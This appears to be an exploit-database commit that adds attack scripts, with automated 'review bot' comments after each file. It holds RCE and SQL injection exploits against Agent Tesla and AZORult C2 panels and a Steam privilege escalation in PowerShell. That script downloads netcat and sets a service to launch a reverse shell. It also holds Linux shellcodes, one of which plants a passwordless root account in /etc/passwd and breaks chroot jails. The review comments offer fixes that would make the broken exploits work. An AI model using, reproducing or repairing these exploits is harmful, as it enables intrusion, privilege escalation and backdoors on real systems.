DB: 2019-08-14
6 changes to exploits/shellcodes Steam Windows Client - Local Privilege Escalation Agent Tesla Botnet - Arbitrary Code Execution AZORult Botnet - SQL Injection Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes) Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break Chroot Jail + Backdoor) + Signature Evasion Shellcode
This commit is contained in:
parent
a32e028b88
commit
998fb1eeec
8 changed files with 505 additions and 0 deletions
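--- /dev/null
+++ b/exploits/php/remote/47243.py
@@ -0,0 +1,54 @@
+import requests
+import argparse
+import base64
+
+# Agent Tesla C2 RCE by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+
+def get_args():
+    parser = argparse.ArgumentParser(
+        prog="agent_tesla_sploit.py",
+        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+        epilog= '''
+This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
+''')
+    parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
+    parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+    parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+    args = parser.parse_args()
+    return args
+
+def pwn_target(target, command, proxy):
+    requests.packages.urllib3.disable_warnings()
+    proxies = {'http': proxy, 'https': proxy}
+    print('[*] Probing...')
+    get_params = {
+        'table':'screens',
+        'primary':'HWID',
+        'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}',
+        'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
+    }
+    target = target + '/server_side/scripts/server_processing.php'
+    try:
+        r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+        print("[*] Your IP: {}".format(r.text))
+        headers = {
+            "User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+        }
+        r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
+        result = r.json()['data'][-1]['HWID']
+        print('[+] {}'.format(result))
+    except:
+        print("[-] ERROR: Something went wrong.")
+        print(r.text)
+        raise
+
+def main():
+    print ()
+    print ('Agent Tesla RCE by prsecurity.')
+    args = get_args()
+    pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+    main()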
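Review bot: `print(r.text)` in the `except` branch of `pwn_target` reads `r` before it is ever bound when the first `requests.get` (the IP check against bot.whatismyipaddress.com) is what raised, so a dead Tor/SOCKS proxy surfaces as an `UnboundLocalError` that masks the real `ProxyError`; bind `r = None` before the `try` and guard the print with `if r is not None: print(r.text)`. The bare `except:` is tolerable only because it re-raises, but it should still be `except Exception:` so a Ctrl-C is not reported as an exploit failure. Separately, `command` is interpolated into `"1=1 UNION SELECT \"{}\""` with no escaping, so any command containing a double quote breaks the injected query instead of being passed through; at minimum the `--command` help text should state that limitation.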
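--- /dev/null
+++ b/exploits/php/remote/47244.py
@@ -0,0 +1,95 @@
+import requests
+import argparse
+import base64
+
+# Azorult 3.3.1 C2 SQLi by prsecurity
+# For research purposes only. Don't pwn what you don't own.
+# change GUID and XOR key to specific beacon, can be extracted from a sample
+
+guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
+key = "\x03\x55\xae"
+
+def get_args():
+    parser = argparse.ArgumentParser(
+        prog="azorult_sploit.py",
+        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
+        epilog= '''
+This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
+''')
+    parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
+    parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
+    parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
+    args = parser.parse_args()
+    return args
+
+def CB_XORm(data, key):
+    j=0
+    key = list(key)
+    data = list(data)
+    tmp = list()
+    for i in range(len(data)):
+        tmp.append(chr(ord(data[i])^ord(key[j])))
+        j += 1
+        if j > (len(key)-1):
+            j = 0
+    return "".join(tmp)
+
+def pwn_target(target, num_records, proxy):
+    requests.packages.urllib3.disable_warnings()
+    proxies = {'http': proxy, 'https': proxy}
+
+    try:
+        r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
+        print("[*] Your IP: {}".format(r.text))
+        headers = {
+            "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
+        }
+        print('[+] Getting URL, LOGIN AND PASS')
+        data = [
+            "|".join([
+                "1","2","3","4","5","6","7","8","9","10","11","12"
+            ]),
+            "\r\n".join([
+                "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
+            ]),
+            "c",
+            "d",
+            ":".join(["'11","22"])
+        ]
+        payload = CB_XORm(guid.join(data), key)
+        r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+        if r.text != "OK":
+            print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+            raise
+        print('[+] Getting LOGIN/PASS')
+        data = [
+            "|".join([
+                "1","2","3","4","5","6","7","8","9","10","11","12"
+            ]),
+            "\r\n".join([
+                "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
+            ]),
+            "c",
+            "d",
+            ":".join(["'11","22"])
+        ]
+        payload = CB_XORm(guid.join(data), key)
+        r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
+        if r.text != "OK":
+            print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
+            raise
+        print('[+] If this worked, you will see two new records in password table at guest.php')
+    except:
+        print("[-] ERROR: Something went wrong.")
+        print(r.text)
+        raise
+
+def main():
+    print ()
+    print ('Azorult 3.3.1 SQLi by prsecurity')
+    args = get_args()
+    pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+    main()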
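Review bot: The script cannot run as published: `main` passes `args.num_records`, but the option is declared as `-n/--id_record`, so argparse exposes `args.id_record` and the call raises `AttributeError` before any request is sent; it should read `pwn_target(args.target.strip(), args.id_record.strip(), args.proxy.strip())`. Inside `pwn_target`, `headers` is a set literal holding one string rather than a `{"User-agent": "Mozilla/5.0 ..."}` mapping, which `requests.post` will reject, and the two bare `raise` statements after the `r.text != "OK"` checks have no active exception, so they fail with `RuntimeError` instead of reporting the version mismatch; `raise RuntimeError("unexpected response")` is what is meant. The `--proxy` help says "default = tor" while the default is `http://localhost:8080`, unlike the `socks5://localhost:9150` default in the sibling 47243.py, so one of the two should be corrected.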
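--- /dev/null
+++ b/exploits/windows/local/47238.ps1
@@ -0,0 +1,30 @@
+$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
+$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
+$RegDir = "C:\Windows\Temp\RegLN.exe"
+$PayDir = "C:\Windows\Temp\payload.exe"
+$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
+$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
+$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
+$WebClient = New-Object System.Net.WebClient
+
+
+If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
+{
+    $WebClient.DownloadFile($PayDownload, $PayDir)
+    $WebClient.DownloadFile($RegDownload, $RegDir)
+}
+
+If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
+{
+    Start-Service -DisplayName "Steam Client Service"
+    Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+    Start-Service -Name "msiserver"
+}
+Else
+{
+    Remove-Item -Path $SteamRegKey -Recurse
+    Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
+    Start-Service -DisplayName "Steam Client Service"
+    Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
+    Start-Service -Name "msiserver"
+}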
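Review bot: Both `nc.exe` and `RegLN.exe` are fetched at run time from a third-party GitHub raw URL and then launched through the `msiserver` service (which normally runs as LocalSystem) with no integrity check, so whoever controls that repository controls what runs as the privileged service; pin the expected digests and verify before `Start-Service`, e.g. `if ((Get-FileHash $PayDir -Algorithm SHA256).Hash -ne $PayHash) { throw "payload hash mismatch" }`. The script also leaves `msiserver`'s `ImagePath` pointing at the reverse-shell command line and the Steam NSIS key deleted or relinked, with no cleanup, so Windows Installer stays broken on the test host until someone restores it by hand; capture the original value with `Get-ItemProperty -Path $MSIRegKey -Name ImagePath` before the `Set-ItemProperty` and restore it after the service start. Note that `-ErrorAction SilentlyContinue` on the key probe makes an access-denied error indistinguishable from "key absent", which sends execution into the `Else` branch that runs `Remove-Item -Recurse` on the key.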
@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port
|
|||
47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
|
||||
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
|
||||
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
|
||||
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port
|
|||
47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
|
||||
47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
|
||||
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
|
||||
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
|
||||
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
|
|
@ -993,3 +993,6 @@ id,file,description,date,author,type,platform
|
|||
47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
|
||||
47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
|
||||
47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
|
||||
47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
|
||||
47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
|
||||
47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
|
||||
|
|
|
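--- /dev/null
+++ b/shellcodes/linux/47239.c
@@ -0,0 +1,49 @@
+/* Alpha (AXP) Linux/Tru64 execve() shellcode
+ * ==========================================
+ * This shellcode uses the stack to store a generated
+ * "callsys" instruction, due to this it needs executable
+ * stack. To test on Linux use "execstack -s <bin>" and
+ * on Tru64 use "sysconfig -r proc executable_stack=1".
+ *
+ * Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
+ *
+ * -- Hacker Fantastic (https://hacker.house)
+ */
+#include <stdio.h>
+#include <stdlib.h>
+
+unsigned char shellcode[] = {
+    "\x80\xff\xde\x23" /* lda $sp,-128($sp) */
+    "\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */
+    "\x2f\x2f\x21\x20" /* sll $1, 0x20 */
+    "\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */
+    "\x69\x6e\x5f\x24" /* addq $1, $2, $1 */
+    "\x2f\x62\x42\x20" /* stq $31, -32($sp) */
+    "\x01\x04\x22\x40" /* stq $31, -24($sp) */
+    "\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */
+    "\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */
+    "\xf8\xff\xfe\xb7" /* mov $sp, $16 */
+    "\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */
+    "\x10\x04\xfe\x47" /* stq $16, -40($sp) */
+    "\x30\x15\x02\x42" /* mov $sp, $17 */
+    "\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */
+    "\x11\x04\xfe\x47" /* mov $sp, $18 */
+    "\x31\x15\x25\x42" /* subq $18, 0x18, $18 */
+    "\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */
+    "\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */
+    "\x3c\xff\x1f\x20" /* subq $0, $1, $0 */
+    "\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */
+    "\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */
+    "\x84\xff\x3f\x20" /* subq $1, $2, $1 */
+    "\x01\xff\x5f\x20" /* stl $1, -48($sp) */
+    "\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */
+    "\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */
+    "\x3e\x15\xc6\x43"
+    "\xc4\x3f\xde\x6b"
+};
+
+int main(){
+    int (*func)();
+    func = (int (*)())shellcode;
+    func();
+}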
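Review bot: The per-dword comments in `shellcode[]` are out of step with the bytes from the second entry onward: `"\x73\x68\x3f\x24"` decodes to `ldah $1,0x6873($31)` and the next dword `"\x2f\x2f\x21\x20"` to `lda $1,0x2f2f($1)`, i.e. the two instructions that make up the `ldil $1, 0x68732f2f` pseudo-op named on the first of them, so every `ldil` comment covers two dwords and the labels drift until the final two dwords (the generated `callsys` sequence the header describes) carry no comment at all. A reader checking the listing against a disassembler will conclude it is a different payload; either put one comment per dword (`/* ldah $1,0x6873($31) */`, `/* lda $1,0x2f2f($1) */`, …) or replace the annotations with an `objdump -d` listing of the 27 dwords. The `stdio.h`/`stdlib.h` includes are unused and can be dropped or documented as scaffolding.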
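--- /dev/null
+++ b/shellcodes/linux_x86/47240.S
@@ -0,0 +1,67 @@
+# tolower() execve() /bin/sh -c (user supplied command)
+# shellcode to evade tolower() and friends, requires %esi
+# to reference a valid writeable address (usually does)
+.text
+.global _start
+_start:
+jmp data
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+nop
+start:
+popl %edi
+movl %edi, %ecx
+xorl %eax,%eax
+movl %eax,%es:(%esi)
+pushl %es:(%esi)
+pushl $0x68732f2f
+pushl $0x6e69622f
+movl %esp,%ebx
+movl %eax,%es:(%esi)
+pushl %es:(%esi)
+pushw $0x632d
+movl %esp,%edi
+movl %eax,%es:(%esi)
+pushl %es:(%esi)
+movl %ecx,%eax
+movl %eax,%es:(%esi)
+pushl %es:(%esi)
+movl %edi,%eax
+movl %eax,%es:(%esi)
+pushl %es:(%esi)
+movl %ebx,%eax
+movl %eax,%es:(%esi)
+pushl %es:(%esi)
+movl %esp,%esi
+movl %esi,%ecx
+xorl %eax, %eax
+movb $0x08, %al
+addb $0x03, %al
+int $0x80
+data:
+call start
+#command
+.ascii "id"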
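Review bot: The command at `data:` is emitted with `.ascii "id"`, which does not append a NUL terminator, so the `argv[2]` string that `popl %edi` picks up after `call start` is terminated only by whatever byte happens to follow the shellcode in memory; use `.asciz "id"` (or `.ascii "id\0"`) so the string length is well-defined, especially since the header invites users to substitute their own command. The header states only that `%esi` must point at writable memory, but the `movl %eax,%es:(%esi)` / `pushl %es:(%esi)` pairs also assume `%es` holds a valid data selector and that the scratch word at `(%esi)` can be clobbered, which should be added to that note. The 26 `nop`s before `start:` read as a hard-coded pad; a one-line comment should state their purpose (presumably to keep the encoded `jmp data` displacement out of the byte range tolower() rewrites) so the count is not silently changed.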
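--- /dev/null
+++ b/shellcodes/linux_x86/47242.asm
@@ -0,0 +1,204 @@
+;# Description: SCORE - The ShellCORE
+;# score is a complete shellcode for x86 processors running
+;# linux. It is designed to help work further with an exploited
+;# process.
+;#
+;# Coded by: prdelka
+
+;#########################
+;# [CORE] #
+;#########################
+
+;--- NOP Equivalent instruction
+cld
+cld
+cld
+cld
+cld
+cld
+cld
+cld
+cld
+cld
+cld
+cld
+
+;--- core initialise
+jmp $+0x06
+pop edi
+push edi
+jmp edi
+call $-0x04
+;--- core prompt
+pop edi
+push 0x3e0a7964
+push 0x61655220
+push 0x65726f43
+xor eax,eax
+mov al,0x4
+xor ebx,ebx
+mov bl,0x1
+mov ecx,esp
+xor edx,edx
+mov dl,0xc
+int 0x80
+;--- core read choice
+xor eax,eax
+mov ebp,esp
+push eax
+mov al,0x3
+xor ebx,ebx
+mov bl,0x1
+mov ecx,ebp
+xor edx,edx
+mov dl,0x2
+int 0x80
+;--- core module selector
+mov edx,ebp
+
+;### [backdoor module] 'b'
+cmp word[edx],0x0a62
+je $+0x5e
+;### [break-chroot-jail module] 'j'
+cmp word[edx],0x0a6a
+je $+0x59
+;### [privilege restore module] 'p'
+cmp word[edx],0x0a70
+je $+0x37
+;### [shellcode module] 's'
+cmp word[edx],0x0a73
+je $+0x14
+;### [exit module] 'x'
+cmp word[edx],0x0a78
+je $+0x05
+;--- core loop
+push edi
+jmp edi
+
+;#########################
+;# [MODULES] #
+;#########################
+
+;--- [exit module]
+xor eax,eax
+mov al,0x1
+xor ebx,ebx
+int 0x80
+
+;--- [shellcode module]
+xor eax,eax
+push eax
+push 0x68732f2f
+push 0x6e69622f
+mov ebx,esp
+push eax
+mov edx,esp
+push ebx
+mov ecx,esp
+mov al,0xB
+int 0x80
+;### [core loop]
+push edi
+jmp edi
+
+;--- [privilege restore module]
+xor eax,eax
+mov ah,0x17
+shr eax,0x8
+xor ebx,ebx
+int 0x80
+xor eax,eax
+mov ah,0x2e
+shr eax,0x8
+xor ebx,ebx
+int 0x80
+;### [core loop]
+push edi
+jmp edi
+
+;### [LONG backdoor module jump]
+jmp $+0x46
+
+;--- [break-chroot-jail]
+xor eax,eax
+push eax
+push 0x6c69616a
+mov ebx,esp
+mov edx,esp
+mov cx,0x2F3
+mov al,0x27
+int 0x80
+xor eax,eax
+push eax
+mov ebx,edx
+mov al,0x3d
+int 0x80
+push 0x2e2e2e2e
+mov ebx,esp
+add bl,0x2
+mov edx,ebx
+xor ecx,ecx
+mov cl,0xff
+mov al,0x0c
+mov ebx,edx
+int 0x80
+loop $-0x06
+mov ebx,edx
+add bl,0x1
+mov al,0x3d
+int 0x80
+;### [core loop]
+push edi
+jmp edi
+
+;--- [backdoor module]
+xor eax,eax
+push eax
+push 0x64777373
+push 0x61702f2f
+push 0x6374652f
+mov esi,esp
+xor edx,edx
+xor ecx,ecx
+mov cl,0x01
+mov ebx,esi
+xor eax,eax
+mov al,0x5
+int 0x80
+push eax
+mov esi,esp
+xor eax,eax
+mov al,0x13
+mov ebx,[esi]
+xor ecx,ecx
+xor edx,edx
+mov dl,0x2
+int 0x80
+xor eax,eax
+mov al,0x4
+mov ebx,[esi]
+xor ecx,ecx
+push ecx
+push 0x0a687361
+push 0x622f6e69
+push 0x622f3a74
+push 0x6f6f722f
+push 0x3a676663
+push 0x20726f66
+push 0x20726573
+push 0x75206d65
+push 0x74737973
+push 0x3a303a30
+push 0x3a3a6766
+push 0x63737973
+mov ecx,esp
+xor edx,edx
+mov dl,0x30
+int 0x80
+xor eax,eax
+mov al,0x6
+mov ebx,[esi]
+int 0x80
+;### [core loop]
+push edi
+jmp edi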
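Review bot: The module selector dispatches with hard-coded relative displacements (`je $+0x5e`, `je $+0x59`, `je $+0x37`, `je $+0x14`, `je $+0x05`, plus `jmp $+0x46` and `loop $-0x06`), so any edit that changes the byte length of one module silently retargets every later branch into the middle of an instruction; replace them with labels (`je backdoor`, `je chroot_jail`, `je priv_restore`, …) and let the assembler compute the offsets. The header also never says what the modules do, which a reader of a 200-line opcode listing needs: decoded from the pushed dwords, the 'b' module opens `/etc//passwd` with `O_WRONLY`, `lseek`s to `SEEK_END` and writes the 0x30-byte line `syscfg::0:0:system user for cfg:/root:/bin/bash` (a passwordless uid-0 account), and the 'p' module issues `setuid(0)` then `setgid(0)` (syscalls 0x17 and 0x2e with `ebx=0`); the 'j' module appears to mkdir/chroot into `jail` and `chdir("..")` 255 times before a second chroot. That passwd line is the detection artifact for this payload and belongs in the description block, not only in the hex.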